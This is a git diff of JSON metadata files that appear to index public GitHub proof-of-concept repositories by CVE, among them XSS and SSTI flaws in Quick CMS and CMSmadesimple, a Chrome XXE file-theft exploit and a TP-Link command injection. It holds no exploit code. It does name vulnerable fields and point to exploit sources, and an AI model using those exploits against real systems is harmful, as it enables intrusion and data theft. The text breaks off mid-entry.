b/2023/CVE-2023-43344.json new file mode 100644 index 0000000000..ccda939ad1 --- /dev/null +++ b/2023/CVE-2023-43344.json @@ -0,0 +1,33 @@ +[ + { + "id": 693027301, + "name": "CVE-2023-43344-Quick-CMS-Stored-XSS---SEO-Meta-description", + "full_name": "sromanhu\/CVE-2023-43344-Quick-CMS-Stored-XSS---SEO-Meta-description", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43344-Quick-CMS-Stored-XSS---SEO-Meta-description", + "description": "Quick CMS 6.7 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the SEO- Meta description in the Pages Menu.", + "fork": false, + "created_at": "2023-09-18T07:46:02Z", + "updated_at": "2023-09-28T22:33:43Z", + "pushed_at": "2023-09-21T12:07:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43345.json b/2023/CVE-2023-43345.json new file mode 100644 index 0000000000..95693857ab --- /dev/null +++ b/2023/CVE-2023-43345.json @@ -0,0 +1,33 @@ +[ + { + "id": 693025701, + "name": "CVE-2023-43345-Quick-CMS-Stored-XSS---Pages-Content", + "full_name": "sromanhu\/CVE-2023-43345-Quick-CMS-Stored-XSS---Pages-Content", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43345-Quick-CMS-Stored-XSS---Pages-Content", + "description": "Quick CMS 6.7 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Content- Name in the Pages Menu.", + "fork": false, + "created_at": "2023-09-18T07:41:33Z", + "updated_at": "2023-09-28T22:34:01Z", + "pushed_at": "2023-09-21T12:07:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43346.json b/2023/CVE-2023-43346.json new file mode 100644 index 0000000000..02d9076f34 --- /dev/null +++ b/2023/CVE-2023-43346.json @@ -0,0 +1,33 @@ +[ + { + "id": 693030903, + "name": "CVE-2023-43346-Quick-CMS-Stored-XSS---Languages-Backend", + "full_name": "sromanhu\/CVE-2023-43346-Quick-CMS-Stored-XSS---Languages-Backend", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43346-Quick-CMS-Stored-XSS---Languages-Backend", + "description": "Quick CMS 6.7 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Backend- Dashboard in the Languages Menu.", + "fork": false, + "created_at": "2023-09-18T07:55:10Z", + "updated_at": "2023-09-28T22:34:19Z", + "pushed_at": "2023-09-21T12:06:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43352.json b/2023/CVE-2023-43352.json new file mode 100644 index 0000000000..d9a05c1cb3 --- /dev/null +++ b/2023/CVE-2023-43352.json @@ -0,0 +1,33 @@ +[ + { + "id": 692736626, + "name": "CVE-2023-43352-CMSmadesimple-SSTI--Content", + "full_name": "sromanhu\/CVE-2023-43352-CMSmadesimple-SSTI--Content", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43352-CMSmadesimple-SSTI--Content", + "description": "SSTI vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to use native template syntax to inject a malicious payload into a template, which is then executed server-side", + "fork": false, + "created_at": "2023-09-17T12:35:39Z", + "updated_at": "2023-09-28T22:34:41Z", + "pushed_at": "2023-09-21T12:18:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43353.json b/2023/CVE-2023-43353.json new file mode 100644 index 0000000000..5817357a90 --- /dev/null +++ b/2023/CVE-2023-43353.json @@ -0,0 +1,33 @@ +[ + { + "id": 692732972, + "name": "CVE-2023-43353-CMSmadesimple-Stored-XSS---News---Extra", + "full_name": "sromanhu\/CVE-2023-43353-CMSmadesimple-Stored-XSS---News---Extra", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43353-CMSmadesimple-Stored-XSS---News---Extra", + "description": "Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Extrain the Content - News Menu.", + "fork": false, + "created_at": "2023-09-17T12:21:12Z", + "updated_at": "2023-09-28T22:34:59Z", + "pushed_at": "2023-09-21T12:23:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43354.json b/2023/CVE-2023-43354.json new file mode 100644 index 0000000000..75496684f0 --- /dev/null +++ b/2023/CVE-2023-43354.json @@ -0,0 +1,33 @@ +[ + { + "id": 692730333, + "name": "CVE-2023-43354-CMSmadesimple-Stored-XSS---MicroTIny-extension", + "full_name": "sromanhu\/CVE-2023-43354-CMSmadesimple-Stored-XSS---MicroTIny-extension", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43354-CMSmadesimple-Stored-XSS---MicroTIny-extension", + "description": "Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Profile in the MicroTIny Menu.", + "fork": false, + "created_at": "2023-09-17T12:10:54Z", + "updated_at": "2023-09-28T22:35:16Z", + "pushed_at": "2023-09-21T12:24:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43355.json b/2023/CVE-2023-43355.json new file mode 100644 index 0000000000..3217556010 --- /dev/null +++ b/2023/CVE-2023-43355.json @@ -0,0 +1,33 @@ +[ + { + "id": 692734818, + "name": "CVE-2023-43355-CMSmadesimple-Reflected-XSS---Add-user", + "full_name": "sromanhu\/CVE-2023-43355-CMSmadesimple-Reflected-XSS---Add-user", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43355-CMSmadesimple-Reflected-XSS---Add-user", + "description": "Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the password and password again in the My Preferences - Add user", + "fork": false, + "created_at": "2023-09-17T12:28:23Z", + "updated_at": "2023-09-28T22:35:45Z", + "pushed_at": "2023-09-21T12:19:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43356.json b/2023/CVE-2023-43356.json new file mode 100644 index 0000000000..1f286995d1 --- /dev/null +++ b/2023/CVE-2023-43356.json @@ -0,0 +1,33 @@ +[ + { + "id": 692725247, + "name": "CVE-2023-43356-CMSmadesimple-Stored-XSS---Global-Settings", + "full_name": "sromanhu\/CVE-2023-43356-CMSmadesimple-Stored-XSS---Global-Settings", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43356-CMSmadesimple-Stored-XSS---Global-Settings", + "description": "Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Global Meatadata in the Settings- Global Settings Menu.", + "fork": false, + "created_at": "2023-09-17T11:50:00Z", + "updated_at": "2023-09-28T22:36:00Z", + "pushed_at": "2023-09-21T12:26:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43357.json b/2023/CVE-2023-43357.json new file mode 100644 index 0000000000..71d82e745e --- /dev/null +++ b/2023/CVE-2023-43357.json @@ -0,0 +1,33 @@ +[ + { + "id": 692734079, + "name": "CVE-2023-43357-CMSmadesimple-Stored-XSS---Shortcut", + "full_name": "sromanhu\/CVE-2023-43357-CMSmadesimple-Stored-XSS---Shortcut", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43357-CMSmadesimple-Stored-XSS---Shortcut", + "description": "Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Title in the My Preferences - Manage Shortcuts", + "fork": false, + "created_at": "2023-09-17T12:25:24Z", + "updated_at": "2023-09-28T22:36:24Z", + "pushed_at": "2023-09-21T12:20:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43358.json b/2023/CVE-2023-43358.json new file mode 100644 index 0000000000..8e886ada7a --- /dev/null +++ b/2023/CVE-2023-43358.json @@ -0,0 +1,33 @@ +[ + { + "id": 692732099, + "name": "CVE-2023-43358-CMSmadesimple-Stored-XSS---News", + "full_name": "sromanhu\/CVE-2023-43358-CMSmadesimple-Stored-XSS---News", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43358-CMSmadesimple-Stored-XSS---News", + "description": "Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Title in the Content - News Menu.", + "fork": false, + "created_at": "2023-09-17T12:17:49Z", + "updated_at": "2023-09-28T22:36:39Z", + "pushed_at": "2023-09-21T12:23:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43359.json b/2023/CVE-2023-43359.json new file mode 100644 index 0000000000..7dc9f1a986 --- /dev/null +++ b/2023/CVE-2023-43359.json @@ -0,0 +1,33 @@ +[ + { + "id": 692727411, + "name": "CVE-2023-43359-CMSmadesimple-Stored-XSS----Content-Manager", + "full_name": "sromanhu\/CVE-2023-43359-CMSmadesimple-Stored-XSS----Content-Manager", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43359-CMSmadesimple-Stored-XSS----Content-Manager", + "description": "Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to Page Specific Metadata and Smarty data in the Content Manager Menu.", + "fork": false, + "created_at": "2023-09-17T11:58:54Z", + "updated_at": "2023-09-28T22:36:55Z", + "pushed_at": "2023-09-21T12:26:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43360.json b/2023/CVE-2023-43360.json new file mode 100644 index 0000000000..4d61d2313c --- /dev/null +++ b/2023/CVE-2023-43360.json @@ -0,0 +1,33 @@ +[ + { + "id": 692729326, + "name": "CVE-2023-43360-CMSmadesimple-Stored-XSS---File-Picker-extension", + "full_name": "sromanhu\/CVE-2023-43360-CMSmadesimple-Stored-XSS---File-Picker-extension", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43360-CMSmadesimple-Stored-XSS---File-Picker-extension", + "description": "Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Top Directory in the File Picker Menu.", + "fork": false, + "created_at": "2023-09-17T12:06:56Z", + "updated_at": "2023-09-28T22:37:11Z", + "pushed_at": "2023-09-21T12:25:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43364.json b/2023/CVE-2023-43364.json new file mode 100644 index 0000000000..76f3c79eec --- /dev/null +++ b/2023/CVE-2023-43364.json @@ -0,0 +1,33 @@ +[ + { + "id": 792126842, + "name": "CVE-2023-43364-Exploit-CVE", + "full_name": "libertycityhacker\/CVE-2023-43364-Exploit-CVE", + "owner": { + "login": "libertycityhacker", + "id": 168156205, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168156205?v=4", + "html_url": "https:\/\/github.com\/libertycityhacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/libertycityhacker\/CVE-2023-43364-Exploit-CVE", + "description": null, + "fork": false, + "created_at": "2024-04-26T03:09:09Z", + "updated_at": "2024-04-26T03:12:27Z", + "pushed_at": "2024-04-26T03:12:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43481.json b/2023/CVE-2023-43481.json new file mode 100644 index 0000000000..1499b8d915 --- /dev/null +++ b/2023/CVE-2023-43481.json @@ -0,0 +1,35 @@ +[ + { + "id": 690844082, + "name": "com.tcl.browser", + "full_name": "actuator\/com.tcl.browser", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/com.tcl.browser", + "description": "CVE-2023-43481 ", + "fork": false, + "created_at": "2023-09-13T02:03:34Z", + "updated_at": "2023-12-28T05:18:57Z", + "pushed_at": "2024-04-13T01:51:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-43481" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43482.json b/2023/CVE-2023-43482.json new file mode 100644 index 0000000000..f5a842999a --- /dev/null +++ b/2023/CVE-2023-43482.json @@ -0,0 +1,33 @@ +[ + { + "id": 779866606, + "name": "CVE-2023-43482", + "full_name": "Mr-xn\/CVE-2023-43482", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2023-43482", + "description": "TP-Link ER7206 Omada Gigabit VPN Router uhttpd freeStrategy Command injection Vulnerability", + "fork": false, + "created_at": "2024-03-31T02:04:34Z", + "updated_at": "2024-06-21T00:12:16Z", + "pushed_at": "2024-03-31T02:07:27Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43494.json b/2023/CVE-2023-43494.json new file mode 100644 index 0000000000..62e85281ea --- /dev/null +++ b/2023/CVE-2023-43494.json @@ -0,0 +1,33 @@ +[ + { + "id": 845711489, + "name": "CVE-2023-43494", + "full_name": "mqxmm\/CVE-2023-43494", + "owner": { + "login": "mqxmm", + "id": 79595418, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79595418?v=4", + "html_url": "https:\/\/github.com\/mqxmm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mqxmm\/CVE-2023-43494", + "description": "Jenkins 2.50 through 2.423 (both inclusive), LTS 2.60.1 through 2.414.1 (both inclusive) File Read", + "fork": false, + "created_at": "2024-08-21T19:26:09Z", + "updated_at": "2024-08-21T19:33:22Z", + "pushed_at": "2024-08-21T19:33:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4357.json b/2023/CVE-2023-4357.json new file mode 100644 index 0000000000..d000c4d127 --- /dev/null +++ b/2023/CVE-2023-4357.json @@ -0,0 +1,221 @@ +[ + { + "id": 719987092, + "name": "CVE-2023-4357-Chrome-XXE", + "full_name": "xcanwin\/CVE-2023-4357-Chrome-XXE", + "owner": { + "login": "xcanwin", + "id": 14187349, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14187349?v=4", + "html_url": "https:\/\/github.com\/xcanwin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xcanwin\/CVE-2023-4357-Chrome-XXE", + "description": "[漏洞复现] 全球首款单文件利用 CVE-2023-4357 Chrome XXE 漏洞 EXP, 实现对访客者本地文件窃取. Chrome XXE vulnerability EXP, allowing attackers to obtain local files of visitors.", + "fork": false, + "created_at": "2023-11-17T10:32:31Z", + "updated_at": "2024-12-26T07:07:35Z", + "pushed_at": "2023-11-21T10:45:58Z", + "stargazers_count": 205, + "watchers_count": 205, + "has_discussions": false, + "forks_count": 34, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-4357" + ], + "visibility": "public", + "forks": 34, + "watchers": 205, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 720888487, + "name": "CVE-2023-4357-APT-Style-exploitation", + "full_name": "OgulcanUnveren\/CVE-2023-4357-APT-Style-exploitation", + "owner": { + "login": "OgulcanUnveren", + "id": 112496046, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112496046?v=4", + "html_url": "https:\/\/github.com\/OgulcanUnveren", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OgulcanUnveren\/CVE-2023-4357-APT-Style-exploitation", + "description": "Apt style exploitation of Chrome 0day CVE-2023-4357", + "fork": false, + "created_at": "2023-11-19T22:20:10Z", + "updated_at": "2024-11-15T16:57:30Z", + "pushed_at": "2023-11-20T01:02:44Z", + "stargazers_count": 43, + "watchers_count": 43, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 43, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 721463764, + "name": "CVE-2023-4357-APT-Style-exploitation", + "full_name": "passwa11\/CVE-2023-4357-APT-Style-exploitation", + "owner": { + "login": "passwa11", + "id": 112363374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112363374?v=4", + "html_url": "https:\/\/github.com\/passwa11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/passwa11\/CVE-2023-4357-APT-Style-exploitation", + "description": null, + "fork": false, + "created_at": "2023-11-21T05:39:15Z", + "updated_at": "2023-11-21T05:39:35Z", + "pushed_at": "2023-11-21T05:39:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 725033535, + "name": "chrome-CVE-2023-4357", + "full_name": "sunu11\/chrome-CVE-2023-4357", + "owner": { + "login": "sunu11", + "id": 23350775, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23350775?v=4", + "html_url": "https:\/\/github.com\/sunu11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sunu11\/chrome-CVE-2023-4357", + "description": "poc", + "fork": false, + "created_at": "2023-11-29T09:52:36Z", + "updated_at": "2024-08-04T14:36:25Z", + "pushed_at": "2023-11-29T09:57:16Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 740847452, + "name": "CVE-2023-4357", + "full_name": "WinnieZy\/CVE-2023-4357", + "owner": { + "login": "WinnieZy", + "id": 15833215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15833215?v=4", + "html_url": "https:\/\/github.com\/WinnieZy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WinnieZy\/CVE-2023-4357", + "description": null, + "fork": false, + "created_at": "2024-01-09T07:31:29Z", + "updated_at": "2024-08-05T09:02:17Z", + "pushed_at": "2024-01-09T07:56:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 773285621, + "name": "CVE-2023-4357-Exploitation", + "full_name": "lon5948\/CVE-2023-4357-Exploitation", + "owner": { + "login": "lon5948", + "id": 90599149, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90599149?v=4", + "html_url": "https:\/\/github.com\/lon5948", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lon5948\/CVE-2023-4357-Exploitation", + "description": "Network Security Project", + "fork": false, + "created_at": "2024-03-17T08:48:19Z", + "updated_at": "2024-08-05T09:04:59Z", + "pushed_at": "2024-04-13T16:49:56Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 817801754, + "name": "CVE-2023-4357", + "full_name": "CamillaFranceschini\/CVE-2023-4357", + "owner": { + "login": "CamillaFranceschini", + "id": 32276847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32276847?v=4", + "html_url": "https:\/\/github.com\/CamillaFranceschini", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CamillaFranceschini\/CVE-2023-4357", + "description": null, + "fork": false, + "created_at": "2024-06-20T13:20:43Z", + "updated_at": "2024-06-20T13:20:56Z", + "pushed_at": "2024-06-20T13:20:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43622.json b/2023/CVE-2023-43622.json new file mode 100644 index 0000000000..c418a77b1e --- /dev/null +++ b/2023/CVE-2023-43622.json @@ -0,0 +1,33 @@ +[ + { + "id": 807622468, + "name": "CVE-2023-43622", + "full_name": "visudade\/CVE-2023-43622", + "owner": { + "login": "visudade", + "id": 49928261, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49928261?v=4", + "html_url": "https:\/\/github.com\/visudade", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/visudade\/CVE-2023-43622", + "description": "CVE-2023–43622", + "fork": false, + "created_at": "2024-05-29T13:04:29Z", + "updated_at": "2024-05-29T13:19:21Z", + "pushed_at": "2024-05-29T13:19:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43646.json b/2023/CVE-2023-43646.json new file mode 100644 index 0000000000..b5a3f35210 --- /dev/null +++ b/2023/CVE-2023-43646.json @@ -0,0 +1,33 @@ +[ + { + "id": 845342008, + "name": "CVE-2023-43646", + "full_name": "200101WhoAmI\/CVE-2023-43646", + "owner": { + "login": "200101WhoAmI", + "id": 176820518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176820518?v=4", + "html_url": "https:\/\/github.com\/200101WhoAmI", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/200101WhoAmI\/CVE-2023-43646", + "description": "redos", + "fork": false, + "created_at": "2024-08-21T04:11:44Z", + "updated_at": "2024-08-21T04:35:04Z", + "pushed_at": "2024-08-21T04:35:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43654.json b/2023/CVE-2023-43654.json new file mode 100644 index 0000000000..0f9e10c687 --- /dev/null +++ b/2023/CVE-2023-43654.json @@ -0,0 +1,64 @@ +[ + { + "id": 699309813, + "name": "ShellTorchChecker", + "full_name": "OligoCyberSecurity\/ShellTorchChecker", + "owner": { + "login": "OligoCyberSecurity", + "id": 102041143, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102041143?v=4", + "html_url": "https:\/\/github.com\/OligoCyberSecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OligoCyberSecurity\/ShellTorchChecker", + "description": "A tool that checks if a TorchServe instance is vulnerable to CVE-2023-43654", + "fork": false, + "created_at": "2023-10-02T11:33:37Z", + "updated_at": "2024-11-07T03:55:55Z", + "pushed_at": "2024-04-21T14:44:21Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 38, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 807005949, + "name": "CVE-2023-43654", + "full_name": "OligoCyberSecurity\/CVE-2023-43654", + "owner": { + "login": "OligoCyberSecurity", + "id": 102041143, + "avatar_url": 